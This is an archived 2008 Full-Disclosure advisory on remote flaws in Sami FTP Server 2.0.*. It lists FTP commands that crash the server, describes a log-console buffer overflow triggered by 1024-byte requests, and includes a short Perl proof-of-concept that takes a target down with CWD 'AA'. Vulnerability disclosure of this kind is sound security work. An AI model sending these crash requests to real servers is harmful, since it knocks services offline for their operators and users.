lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Fri, 15 Feb 2008 13:03:48 -0500
From: lorenzo <securfrog@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Sami FTP Server 2.0.* Multiple Remote
	Vulnerabilities

###################################################################################################################
# Sami FTP Server 2.0.* Multiple Remote Vulnerabilities
#
# Bugs :
#
# 1)Multiples remote denial of service
(CWD,DELE,MKD,RMD,RETR,RNFR,RNTO,SIZE,STOR)
#
# 2)Remote Buffer overflow (Logs)
#
# Remote Denial of service:
# APPE A => server gone
#
# CWD AA => server gone
#
# DELE AA ==> server gone
#
# MKD AA ==> server gone
#
# RMD AA ==> server gone
#
# RETR AA ==> server gone
#
# RNFR AA ==> server gone
#
# RNTO AA ==> server gone
#
# SIZE AA ==> server gone
#
# STOR AA ==> server gone
#
#
# Buffer Overflow :
# In the console management,you can view your logs,and set some stuff,when
you open the console management a
#
# buffer overflow occurs ,if you have send previously a request(no matter
the command) with 1024 bytes to the server.
#
# Also explorer.exe crash at the same time, 2 in 1 ;] The file is called(
SamyFtp.binlog)note that this bug is
#
# quite critical , because it will occurs all the time,when you open the
console management,and you dont need to be loggued
#
# you can simply send a username with 1024 bytes ...
#
#
# @nolife: Life is always better when you dont know. things are clearer also
smile
#
#
#
# Denial of service Poc
#
#

use Net::FTP;

(($target = $ARGV[0])) || die "usage:$0 <target> <port>";

my $user = "anonymous";

my $pass = "something";

print "Trying to connect to :$target...\n";

$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not
connect";

print "Connected!\n";

$ftp->login($user, $pass);

$ftp->cwd("AA");

print "Poc Successfull the server should down now \n";

$ftp->quit;

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ